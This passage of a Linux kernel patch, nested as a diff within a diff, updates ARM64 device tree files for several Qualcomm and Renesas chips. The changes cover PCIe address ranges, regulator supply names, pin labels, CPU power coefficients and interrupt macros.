+ 	smd {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index c103034372fd7..67b87915d8224 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -1828,8 +1828,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0c200000 0x0c200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0c200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1882,8 +1882,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0d200000 0x0d200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0d200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1933,8 +1933,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0e200000 0x0e200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0e200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
+ 
+ 				device_type = "pci";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index f05f16ac5cc18..29c60bb56ed5f 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -916,7 +916,7 @@
+ 			phy-names = "pciephy";
+ 			status = "disabled";
+ 
+-			ranges = <0x01000000 0x0 0x1b200000 0x1b200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x1b200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x1b300000 0x1b300000 0x0 0xd00000>;
+ 
+ 			#interrupt-cells = <1>;
+@@ -1513,7 +1513,7 @@
+ 			compatible = "arm,coresight-stm", "arm,primecell";
+ 			reg = <0x06002000 0x1000>,
+ 			      <0x16280000 0x180000>;
+-			reg-names = "stm-base", "stm-data-base";
++			reg-names = "stm-base", "stm-stimulus-base";
+ 			status = "disabled";
+ 
+ 			clocks = <&rpmcc RPM_SMD_QDSS_CLK>, <&rpmcc RPM_SMD_QDSS_A_CLK>;
+diff --git a/arch/arm64/boot/dts/qcom/pmi8994.dtsi b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+index 542c215dde107..82b60e988d0f5 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+@@ -49,8 +49,6 @@
+ 
+ 		pmi8994_spmi_regulators: regulators {
+ 			compatible = "qcom,pmi8994-regulators";
+-			#address-cells = <1>;
+-			#size-cells = <1>;
+ 		};
+ 
+ 		pmi8994_wled: wled@d800 {
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+index 850776c5323d1..70d5a7aa88735 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+@@ -26,7 +26,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <58 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		hid-descr-addr = <0x20>;
+ 
+ 		wakeup-source;
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+index 56d787785fd59..2e35c69a978fb 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+@@ -39,7 +39,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <0 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		post-power-on-delay-ms = <100>;
+ 		hid-descr-addr = <0x0001>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index b16886f715179..6f0ee4e13ef1d 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -1521,7 +1521,7 @@
+ 				};
+ 			};
+ 
+-			qspi_data12: qspi-data12 {
++			qspi_data23: qspi-data23 {
+ 				pinmux-data {
+ 					pins = "gpio66", "gpio67";
+ 					function = "qspi_data";
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+index 4566722bf4ddf..8f5d82885e447 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+@@ -33,7 +33,7 @@ ap_tp_i2c: &i2c0 {
+ 		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
+ 
+ 		hid-descr-addr = <0x20>;
+-		vcc-supply = <&pp3300_z1>;
++		vdd-supply = <&pp3300_z1>;
+ 
+ 		wakeup-source;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 346da6af51ac9..0cdc579f26de7 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2023,7 +2023,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -3590,12 +3590,17 @@
+ 			      <0 0x88e2000 0 0x1000>;
+ 			interrupts-extended = <&pdc 11 IRQ_TYPE_LEVEL_HIGH>;
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					eud_ep: endpoint {
+ 						remote-endpoint = <&usb2_role_switch>;
+ 					};
+ 				};
+ 				port@1 {
++					reg = <1>;
+ 					eud_con: endpoint {
+ 						remote-endpoint = <&con_eud>;
+ 					};
+@@ -3606,7 +3611,11 @@
+ 		eud_typec: connector {
+ 			compatible = "usb-c-connector";
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					con_eud: endpoint {
+ 						remote-endpoint = <&eud_con>;
+ 					};
+@@ -4336,7 +4345,7 @@
+ 				function = "qspi_data";
+ 			};
+ 
+-			qspi_data12: qspi-data12-pins {
++			qspi_data23: qspi-data23-pins {
+ 				pins = "gpio16", "gpio17";
+ 				function = "qspi_data";
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index d761da47220dd..a99eda4971010 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -198,7 +198,7 @@
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -222,7 +222,7 @@
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -243,7 +243,7 @@
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -264,7 +264,7 @@
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -2226,8 +2226,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0xd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0xd00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -2331,7 +2331,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 47e09d96f6098..78ae4b9eaa106 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1783,8 +1783,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1879,7 +1879,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 29e352a577311..e93955525a107 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -1808,8 +1808,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 142 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1917,7 +1917,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -2025,7 +2025,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x64200000 0x0 0x64200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x64200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x64300000 0x0 0x64300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 243 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+index 9c4cfd995ff29..e87514d8fd84e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+@@ -341,6 +341,9 @@
+ 
+ &usb_1 {
+ 	status = "okay";
++};
++
++&usb_1_dwc3 {
+ 	dr_mode = "peripheral";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 4714d7bf03b9f..128542582b3d8 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -1722,8 +1722,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1831,8 +1831,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0 0x40200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x40300000 0 0x40300000 0x0 0x1fd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1879,8 +1879,8 @@
+ 			phys = <&pcie1_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 97 GPIO_ACTIVE_LOW>;
+-			enable-gpio = <&tlmm 99 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 97 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 99 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_default_state>;
+diff --git a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+index 151e32ac03683..ec7c7851519f4 100644
+--- a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r8a77990.dtsi b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+index 3053b4b214978..3ed31ffd73a28 100644
+--- a/arch/arm64/boot/dts/renesas/r8a77990.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+index 689aa4ba416b8..a4738842f0646 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+@@ -5,7 +5,6 @@
+  * Copyright (C) 2022 Renesas Electronics Corp.
+  */
+ 
+-#include <dt-bindings/interrupt-controller/arm-gic.h>
+ #include <dt-bindings/clock/r9a07g043-cpg.h>
+ 
+ / {
+@@ -107,11 +106,10 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x10049c00 0 0x400>;
+-			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(326) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(327) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(328) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -128,11 +126,10 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a000 0 0x400>;
+-			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(330) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(331) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(332) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -149,11 +146,9 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+-			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(334) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(337) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -170,11 +165,10 @@
+ 			compatible = "renesas,r9a07g043-ssi",
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a800 0 0x400>;
+-			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupts = <SOC_PERIPHERAL_IRQ(338) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(339) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(340) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -190,9 +184,9 @@
+ 		spi0: spi@1004ac00 {
+ 			compatible = "renesas,r9a07g043-rspi", "renesas,rspi-rz";
+ 			reg = <0 0x1004ac00 0 0x400>;
+-			interrupts = <GIC_SPI 415 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 413 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 414 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(415) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(413) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(414) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "error", "rx", "tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_RSPI0_CLKB>;
+ 			resets = <&cpg R9A07G043_RSPI0_RST>;
+@@ -208,9 +202,9 @@
+ 		spi1: spi@1004b000 {
+ 			compatible = "renesas,r9a07g043-rspi", "renesas,rspi-rz";
+ 			reg = <0 0x1004b000 0 0x400>;
+-			interrupts = <GIC_SPI 418 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 416 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 417 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(418) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(416) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(417) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "error", "rx", "tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_RSPI1_CLKB>;
+ 			resets = <&cpg R9A07G043_RSPI1_RST>;
+@@ -226,9 +220,9 @@
+ 		spi2: spi@1004b400 {
+ 			compatible = "renesas,r9a07g043-rspi", "renesas,rspi-rz";
+ 			reg = <0 0x1004b400 0 0x400>;
+-			interrupts = <GIC_SPI 421 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 419 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 420 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(421) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(419) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(420) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "error", "rx", "tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_RSPI2_CLKB>;
+ 			resets = <&cpg R9A07G043_RSPI2_RST>;
+@@ -245,12 +239,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004b800 0 0x400>;
+-			interrupts = <GIC_SPI 380 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 382 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 383 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 381 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 384 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 384 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(380) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(382) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(383) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(381) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(384) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(384) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF0_CLK_PCK>;
+@@ -264,12 +258,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004bc00 0 0x400>;
+-			interrupts = <GIC_SPI 385 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 387 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 388 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 386 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 389 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 389 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(385) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(387) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(388) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(386) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(389) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(389) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF1_CLK_PCK>;
+@@ -283,12 +277,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004c000 0 0x400>;
+-			interrupts = <GIC_SPI 390 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 392 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 393 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 391 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 394 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 394 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(390) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(392) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(393) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(391) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(394) IRQ_TYPE_LEVEL_HIGH>,
